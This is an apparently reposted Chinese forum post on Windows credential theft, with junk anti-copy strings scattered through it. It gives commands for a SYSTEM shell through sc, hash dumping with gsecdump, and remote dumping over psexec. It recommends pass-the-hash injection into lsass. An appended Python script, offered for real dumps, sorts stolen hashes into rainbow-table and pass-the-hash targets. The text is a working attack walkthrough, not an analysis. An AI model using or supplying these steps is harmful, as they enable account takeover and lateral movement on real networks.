Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
; ?( g0 f+ i+ r- v& J% |% {
9 f) ?2 k* \7 ]5 @提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.. d- V; W; k8 R2 O
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
1 \+ Q5 X! ?$ |% q& J
( Q+ D; C2 D3 F* b- e我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
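As an added illustration, and not code from this post, from the TrueSec article, or from gsecdump, PsExec or pshtools, the following Python script triages a pwdump-style dump such as the Active-HASH.TXT written by the psexec line above. It assumes the common user:rid:LMHASH:NTHASH::: line layout (gsecdump's exact output format is not shown on the page, so that layout is an assumption) and works on a constructed sample dump. It separates the accounts that still carry an LM hash (the rainbow-table targets the author refers to), the ones whose LM hash reveals a password of at most 7 characters, blank-password accounts, and the LM:NT pairs that can be replayed without any cracking, which is the point of the hash injection note at the end of the post.

```python
"""Triage a pwdump-style hash dump such as the Active-HASH.TXT written above.

Added example; it is not part of the original post, gsecdump, PsExec or
pshtools. It assumes the dump uses the common pwdump line layout
    user:rid:LMHASH:NTHASH:::
The sample dump below is constructed for illustration, not a real capture.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# LM "hash" stored when there is no LM hash (LM disabled, or password > 14 chars).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# The second 7-char block of an LM hash equals this constant when the password is <= 7 chars.
EMPTY_LM_HALF = EMPTY_LM[16:]
# NT hash of the empty string: the account has no password at all.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass(frozen=True)
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_present(self) -> bool:
        """A real LM hash is stored: case-insensitive, <= 14 chars, rainbow-table friendly."""
        return self.lm != EMPTY_LM

    @property
    def lm_short(self) -> bool:
        """LM hash present and its second half is the empty block: password is <= 7 chars."""
        return self.lm_present and self.lm[16:] == EMPTY_LM_HALF

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    def pth_credential(self) -> str:
        """LM:NT pair, the form pass-the-hash tools generally take (assumed); no cracking needed."""
        return f"{self.lm}:{self.nt}"


def parse_dump(text: str) -> list[HashEntry]:
    """Parse hash lines, skipping tool banners, and keep one entry per account."""
    entries: list[HashEntry] = []
    seen: set[tuple[str, str]] = set()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # banner, usage text or malformed line
        entry = HashEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())
        key = (entry.user.lower(), entry.nt)
        if key in seen:  # the same account shows up once per logon session
            continue
        seen.add(key)
        entries.append(entry)
    return entries


def triage(text: str) -> dict[str, list[str]]:
    """Group accounts by what an attacker can do with the dumped hashes."""
    entries = parse_dump(text)
    return {
        "rainbow_targets": [e.user for e in entries if e.lm_present],
        "short_passwords": [e.user for e in entries if e.lm_short],
        "blank_password": [e.user for e in entries if e.blank_password],
        "pth_credentials": [f"{e.user}:{e.pth_credential()}" for e in entries],
    }


# Constructed sample: one banner line, four accounts, one repeated logon session.
# Administrator's pair is the well-known LM/NT test vector for "password"; the
# other hashes are made-up hex of the right length.
SAMPLE_DUMP = """\
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jdoe:1001:6c8aa0e9b8a8d59daad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for group, users in triage(SAMPLE_DUMP).items():
        print(f"{group}: {users}")
```

Run it against a real dump with `triage(open("Active-HASH.TXT").read())`. Only accounts listed under rainbow_targets are worth feeding to LM rainbow tables; everything else goes straight to the pass-the-hash step, which is what makes cracking optional in the first place.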
: K; v1 b6 q; b/ h, w/ |9 V